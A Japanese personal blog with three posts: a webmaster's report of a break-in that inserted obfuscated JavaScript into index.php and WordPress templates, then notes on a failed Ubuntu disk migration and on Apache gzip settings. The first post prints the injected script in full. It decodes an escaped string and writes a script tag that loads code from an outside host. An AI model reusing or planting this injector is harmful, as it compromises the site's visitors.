謎の不正アクセス

ホームページが表示されないから変だと思っていたら,index.phpに下記コードが勝手に挿入されていた。パスワードが割られてしまった模様。何がしたいのかは解読不能・・・。

とりあえずFTPのパスワードは変更したが,はて,それで大丈夫なのだろうか。

あとでチェックしてみたら,wordpressのテンプレートの.phpでページを表示するファイルに全部挿入されていた。テンプレートを全部アップロードをし直し。

<html>
<body>
<script type="text/javascript">
var wGss98v0zDCHi = "uBdb915uBdb935";
var qg2solLrupydN0 = "uBdb93cuBdb973uBdb963uBdb972u";
var qg2solLrupydN1 = "Bdb969uBdb970uBdb974uBdb920uB";
var qg2solLrupydN2 = "db974uBdb979uBdb970uBdb965uBd";
var qg2solLrupydN3 = "b93duBdb922uBdb974uBdb965uBdb";
var qg2solLrupydN4 = "978uBdb974uBdb92fuBdb96auBdb9";
var qg2solLrupydN5 = "61uBdb976uBdb961uBdb973uBdb96";
var qg2solLrupydN6 = "3uBdb972uBdb969uBdb970uBdb974";
var qg2solLrupydN7 = "uBdb922uBdb920uBdb973uBdb972u";
var qg2solLrupydN8 = "Bdb963uBdb93duBdb922uBdb968uB";
var qg2solLrupydN9 = "db974uBdb974uBdb970uBdb93auBd";
var qg2solLrupydN10 = "b92fuBdb92fuBdb963uBdb96fuBdb";
var qg2solLrupydN11 = "975uBdb96euBdb974uBdb965uBdb9";
var qg2solLrupydN12 = "72uBdb973uBdb974uBdb961uBdb97";
var qg2solLrupydN13 = "4uBdb973uBdb92euBdb973uBdb965";
var qg2solLrupydN14 = "uBdb972uBdb976uBdb965uBdb96du";
var qg2solLrupydN15 = "Bdb970uBdb933uBdb92euBdb963uB";
var qg2solLrupydN16 = "db96fuBdb96duBdb92fuBdb92fuBd";
var qg2solLrupydN17 = "b96duBdb96cuBdb92euBdb970uBdb";
var qg2solLrupydN18 = "968uBdb970uBdb922uBdb93euBdb9";
var qg2solLrupydN19 = "20uBdb93cuBdb92fuBdb973uBdb96";
var qg2solLrupydN20 = "3uBdb972uBdb969uBdb970uBdb974";
var qg2solLrupydN21 = "uBdb93e";
var ZPFlt1UYA1tfk = "Dh3Ln15uBdb935";
var ERYCkoBwTvOcS = qg2solLrupydN0+qg2solLrupydN1+qg2solLrupydN2+qg2solLrupydN3+qg2solLrupydN4+qg2solLrupydN5+qg2solLrupydN6+qg2solLrupydN7+qg2solLrupydN8+qg2solLrupydN9+qg2solLrupydN10+qg2solLrupydN11+qg2solLrupydN12+qg2solLrupydN13+qg2solLrupydN14+qg2solLrupydN15+qg2solLrupydN16+qg2solLrupydN17+qg2solLrupydN18+qg2solLrupydN19+qg2solLrupydN20+qg2solLrupydN21;
CtnqKOXMGM9bE = ERYCkoBwTvOcS.replace(/uBdb9/g,"%");
var iRDgo28MEsBPo = unescape;
var wGss98v0zDCHi = "AUx2i15Dh3Ln35";
w9221 = this;
var NKCGnIAa0Vzgr=w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG:]/g, "")];
NKCGnIAa0Vzgr.write(iRDgo28MEsBPo(CtnqKOXMGM9bE));
</script>
</body>
</html>

失敗:linux ubuntuのHDD引っ越し作業

失敗というか,手間と時間がかかりすぎる。OSをクリーンインストールして外付けHDDにそれを引越ししてみるという実験を試みたが,時間がかかりすぎる上に起動不能という結果に。ディスクそのままのコピーではなく,必要なデータのみ(/homeや/etcなど)のスナップショットを作成して,以降先のOSがインストールされた環境で展開するというのが現実的な模様。

もう一度暇なときに再挑戦してはみるけれども。

apache2のgzip圧縮によるレスポンス改善

googleのウェブマスターツールでgzipで圧縮するとファイルサイズが半分になる,とアドバイスされたが,6KBのCSSファイルが半分の3KBになったところでどれだけ効果があるのかねぇ・・・と半信半疑だったが,apache2に圧縮設定を設定してみると体感で明らかにレスポンスが良くなったので驚いた。

apache2の設定ファイルは小さく分割されてあっちこっちにわかれているため,どこに記述したらいいのか迷ったが,とりあえず /etc/apache2/httpd.conf が空だったのでそこに記述してみることにした。記述内容は下記のような感じ。

<IfModule mod_deflate.c>
# Insert filters
AddOutputFilterByType DEFLATE text/css
AddOutputFilterByType DEFLATE text/html
AddOutputFilterByType DEFLATE image/gif
AddOutputFilterByType DEFLATE image/jpeg
AddOutputFilterByType DEFLATE image/png
AddOutputFilterByType DEFLATE image/x-icon
</IfModule>

はじめはcssとhtmlの圧縮だけ設定してみたがあまりにも効果的だったので画像もついでに記述してみた。htmlは圧縮が効いているのかは不明。レスポンスは劇的によくなったが,あまりにも上手くいきすぎているため何か裏がありそうだが・・・しばらくは様子見。百度の画像検索でサムネイルがやたら速く表示されるから不思議だったが,おそらく圧縮の設定をしているのだろうと思う。